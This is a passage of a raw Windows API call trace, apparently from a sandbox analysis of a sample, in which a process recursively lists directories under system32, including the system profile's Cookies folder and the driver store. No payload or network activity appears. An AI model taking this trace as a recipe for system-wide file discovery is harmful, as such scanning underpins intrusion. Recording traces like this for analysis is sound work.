hHeap=0x5a0000) returned 1 [0025.967] FindClose (in: hFindFile=0x5dbe28 | out: hFindFile=0x5dbe28) returned 1 [0025.967] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dbbd0 | out: hHeap=0x5a0000) returned 1 [0025.967] FindClose (in: hFindFile=0x5dbb90 | out: hFindFile=0x5dbb90) returned 1 [0025.967] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db938 | out: hHeap=0x5a0000) returned 1 [0025.967] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\*", lpFindFileData=0x5db938 | out: lpFindFileData=0x5db938*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x451f, dwReserved1=0x5dd758, cFileName=".", cAlternateFileName="")) returned 0x5dbb90 [0025.967] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x5dbbd0 | out: lpFindFileData=0x5dbbd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x52005c, cFileName=".", cAlternateFileName="")) returned 0x5dbe28 [0025.967] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x5dbe68 | out: lpFindFileData=0x5dbe68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc0c0 [0025.968] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x5dc100 | out: lpFindFileData=0x5dc100*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24aa32c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24aa32c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x52005c, cFileName=".", cAlternateFileName="")) returned 0x5dc358 [0025.968] FindClose (in: hFindFile=0x5dc358 | out: hFindFile=0x5dc358) returned 1 [0025.969] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc100 | out: hHeap=0x5a0000) returned 1 [0025.969] FindClose (in: hFindFile=0x5dc0c0 | out: hFindFile=0x5dc0c0) returned 1 [0025.969] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dbe68 | out: hHeap=0x5a0000) returned 1 [0025.969] FindClose (in: hFindFile=0x5dbe28 | out: hFindFile=0x5dbe28) returned 1 [0025.969] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dbbd0 | out: hHeap=0x5a0000) returned 1 [0025.969] FindClose (in: hFindFile=0x5dbb90 | out: hFindFile=0x5dbb90) returned 1 [0025.970] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db938 | out: hHeap=0x5a0000) returned 1 [0025.970] FindClose (in: hFindFile=0x5de9b8 | out: hFindFile=0x5de9b8) returned 1 [0025.970] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5de760 | out: hHeap=0x5a0000) returned 1 [0025.970] FindClose (in: hFindFile=0x5db8f8 | out: hFindFile=0x5db8f8) returned 1 [0025.970] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db6a0 | out: hHeap=0x5a0000) returned 1 [0025.970] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\TxR\\*", lpFindFileData=0x5db6a0 | out: lpFindFileData=0x5db6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xf1e088, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x5db8f8 [0025.971] FindClose (in: hFindFile=0x5db8f8 | out: hFindFile=0x5db8f8) returned 1 [0025.971] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db6a0 | out: hHeap=0x5a0000) returned 1 [0025.971] FindClose (in: hFindFile=0x5ce0d8 | out: hFindFile=0x5ce0d8) returned 1 [0025.971] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db448 | out: hHeap=0x5a0000) returned 1 [0025.971] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\cs-CZ\\*", lpFindFileData=0x5db448 | out: lpFindFileData=0x5db448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cc4abd3, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cc4abd3, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.973] FindClose (in: hFindFile=0x5ce0d8 | out: hFindFile=0x5ce0d8) returned 1 [0025.974] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db448 | out: hHeap=0x5a0000) returned 1 [0025.978] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\da-DK\\*", lpFindFileData=0x5db448 | out: lpFindFileData=0x5db448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8fab5928, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8fab5928, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.980] FindClose (in: hFindFile=0x5ce0d8 | out: hFindFile=0x5ce0d8) returned 1 [0025.981] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db448 | out: hHeap=0x5a0000) returned 1 [0025.981] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\de-DE\\*", lpFindFileData=0x5db448 | out: lpFindFileData=0x5db448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x2737b7c, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x2737b7c, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.983] FindClose (in: hFindFile=0x5ce0d8 | out: hFindFile=0x5ce0d8) returned 1 [0025.983] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db448 | out: hHeap=0x5a0000) returned 1 [0025.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\Dism\\*", lpFindFileData=0x5dbc38 | out: lpFindFileData=0x5dbc38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf441e2, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e52f2f2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e52f2f2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.985] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\Dism\\en-US\\*", lpFindFileData=0x5dc0b0 | out: lpFindFileData=0x5dc0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e52f2f2, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e5555ab, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc308 [0025.986] FindClose (in: hFindFile=0x5dc308 | out: hFindFile=0x5dc308) returned 1 [0025.987] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc0b0 | out: hHeap=0x5a0000) returned 1 [0025.987] FindClose (in: hFindFile=0x5ce0d8 | out: hFindFile=0x5ce0d8) returned 1 [0025.987] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dbc38 | out: hHeap=0x5a0000) returned 1 [0025.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\*", lpFindFileData=0x5dc230 | out: lpFindFileData=0x5dc230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf441e2, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e9ce759, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\en-US\\*", lpFindFileData=0x5e7758 | out: lpFindFileData=0x5e7758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22952f33, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc488 [0025.989] FindClose (in: hFindFile=0x5dc488 | out: hFindFile=0x5dc488) returned 1 [0025.989] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e7758 | out: hHeap=0x5a0000) returned 1 [0025.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\UMDF\\*", lpFindFileData=0x5e7758 | out: lpFindFileData=0x5e7758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1e9ce759, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc488 [0025.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\UMDF\\en-US\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22894196, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0025.990] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0025.990] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0025.990] FindClose (in: hFindFile=0x5dc488 | out: hFindFile=0x5dc488) returned 1 [0025.990] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e7758 | out: hHeap=0x5a0000) returned 1 [0025.990] FindClose (in: hFindFile=0x5ce0d8 | out: hFindFile=0x5ce0d8) returned 1 [0025.990] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc230 | out: hHeap=0x5a0000) returned 1 [0025.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\*", lpFindFileData=0x5dc230 | out: lpFindFileData=0x5dc230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfee8988a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8421deb9, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8421deb9, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\en-US\\*", lpFindFileData=0x5e7758 | out: lpFindFileData=0x5e7758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1dc3cf96, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x98858ddc, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x98858ddc, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc488 [0025.998] FindClose (in: hFindFile=0x5dc488 | out: hFindFile=0x5dc488) returned 1 [0025.998] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e7758 | out: hHeap=0x5a0000) returned 1 [0025.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\*", lpFindFileData=0x5e7758 | out: lpFindFileData=0x5e7758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfee8988a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x841f7c4a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x833f5788, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc488 [0026.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\1394.inf_amd64_neutral_0b11366838152a76\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x392f7a54, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bdf6803, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bdf6803, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.003] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\61883.inf_amd64_neutral_a64d66bac757464c\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3da54f2d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607ef4b0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607ef4b0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.005] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.005] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.005] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\acpi.inf_amd64_neutral_aed2e7a487803437\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39b4c763, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x46150ef0, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x46150ef0, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.007] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.008] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.008] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\acpipmi.inf_amd64_neutral_256ad642985694b3\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x385b9fdb, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bb22dde, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bb22dde, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.008] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.008] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.008] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adp94xx.inf_amd64_neutral_4928c8870f6a1577\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42198250, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61cc3556, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61cc3556, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.009] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.009] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adpahci.inf_amd64_neutral_b082e95ec9f8c3f9\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422307d1, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61cc3556, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61cc3556, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.009] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.009] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adpu320.inf_amd64_neutral_4ea3d42a9839982a\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422eeeb2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ce96b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ce96b6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.010] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.010] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\af9035bda.inf_amd64_neutral_aa11aa34552d1d4d\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x474c2389, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x660e6b94, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x660e6b94, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.010] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.010] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\agp.inf_amd64_neutral_22cdceb61fbafb43\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4290871e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61e1a1b9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61e1a1b9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.011] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.011] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.011] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\amdsata.inf_amd64_neutral_67db50590108ebd9\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x395cb479, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bedb045, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bedb045, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.012] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.012] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\amdsbs.inf_amd64_neutral_5cae6933bef20aa8\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41eea98b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ad4373, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ad4373, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.012] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.012] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angel264.inf_amd64_neutral_04b54b6322607cce\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4662dcae, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d087cc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d087cc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.013] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.013] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angel64.inf_amd64_neutral_6bed16c93db1ccf3\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x466ec390, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d2e92d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d2e92d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc4c8 [0026.013] FindClose (in: hFindFile=0x5dc4c8 | out: hFindFile=0x5dc4c8) returned 1 [0026.013] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e89b8 | out: hHeap=0x5a0000) returned 1 [0026.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angelu64.inf_amd64_neutral_3d6079dd78127f5e\\*", lpFindFileData=0x5e89b8 | out: lpFindFileData=0x5e89b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46784911, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d54a8d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d54a8d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, 